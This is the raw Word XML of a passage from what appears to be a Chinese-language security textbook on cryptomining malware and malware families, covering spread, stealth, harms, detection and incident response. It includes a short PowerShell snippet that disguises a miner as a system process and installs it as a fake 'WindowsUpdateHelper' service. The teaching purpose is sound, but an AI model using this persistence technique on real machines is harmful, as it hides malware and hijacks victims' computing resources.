    <w:p w14:paraId="0758424B" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过钓鱼邮件附件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF3EAF2" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>捆绑在破解软件中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B892C7E" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用漏洞（如永恒之蓝）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487CAACD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2</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>隐蔽运行：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B149D2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>&lt;POWERSHELL&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3969E4D7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 xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>伪装成系统进程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7CE725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>Copy-Item miner.exe "C:\Windows\System32\svchost-miner.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BC4485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lastRenderedPageBreak/>
        <w:t>New-Service -Name "WindowsUpdateHelper" -BinaryPathName "svchost-miner.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399D6022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3</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>资源劫持：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657DCC92" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>占用</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CPU/GPU</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>资源（通常</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>80-100%</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261DDD2D" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接矿池（如</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>monerohash.com</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62BABC8C" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将算力转化为加密货币（门罗币为主）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E01F5A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典型危害：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211F8707" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="72"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设备发烫：</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CPU</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>温度可达</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>90</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>℃</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518BEE62" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="72"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>性能暴跌：电脑卡顿如老式打字机</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00451373" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="72"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>硬件损耗：显卡寿命缩短</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>50%</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以上</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7507E131" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="72"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>电费激增：每月多消耗数百元</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A56FA68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防御方案：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D13556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1</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进程监控：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F7D7A5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/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>&lt;BASH&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50189FA5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># Linux</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>检测命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB15A73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 xml:space="preserve">top -c  # </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>查看</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CPU</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>占用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE7E1FE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 xml:space="preserve">nvidia-smi  # </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>显卡监控</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D59C8D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2</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网络防护：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E38771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防火墙屏蔽矿池域名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CFD910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3</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>终端防护：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC6FA94" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装杀毒软件（启用挖矿防护模块）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B87C959" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定期更新系统补丁</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63441D0B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4</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应急处理：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471B144D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发现挖矿病毒</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>断网</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>结束异常进程</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>全盘查杀</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修复漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E697A0" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="260" w:after="260" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>恶意软件家族</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D53C42B" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>表</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/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 w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText>STYLEREF 1 \s</w:instrText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/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/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 w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve">SEQ </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText>表</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> \* ARABIC \s 1</w:instrText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/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>22</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>恶意软件家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02"/>
        <w:gridCol w:w="2448"/>
        <w:gridCol w:w="2448"/>
        <w:gridCol w:w="2446"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="2181F8EF" w14:textId="77777777" w:rsidTr="00501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19986F5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类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="13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9DB169C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特点</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="13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4FF1B98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传播方式</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="13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9D23D2E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目标</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="142D80E9" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="849" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="1237BFE5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rFonts w:cs="Times New Roman"/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cs="Times New Roman" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>木马</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1384" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="7FC96A36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伪装正常软件</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1384" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6CFC9865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软件捆绑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/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漏洞利用</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1384" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="316F416B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窃密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/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远程控制</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="7F5D14A2" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="849" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="30B738B9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rFonts w:cs="Times New Roman"/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病毒</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1384" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="0007CF07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自我复制感染</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1384" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="469DED66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文件传播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/U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盘</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1384" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="33A94231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破坏系统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/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数据</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="30CBDFC2" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="849" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="30ED8BF4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流氓软件</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1384" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="241EE848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强制安装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/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难以卸载</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1384" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="50C1E76D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下载器捆绑</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1384" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="39D80F33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弹广告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/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劫持浏览器</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="45700604" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="849" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="1853F337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lastRenderedPageBreak/>
              <w:t>勒索软件</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1384" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="67A6415F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加密文件索要赎金</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1384" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="7026C2C9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钓鱼邮件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/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漏洞</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1384" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="1A0B7ABB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金钱勒索</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="75A39620" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FC33F31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典型案例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205BEE21" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="74"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>木马：</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Emotet</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（银行木马）</w:t>
      </w:r>
    </w:p>
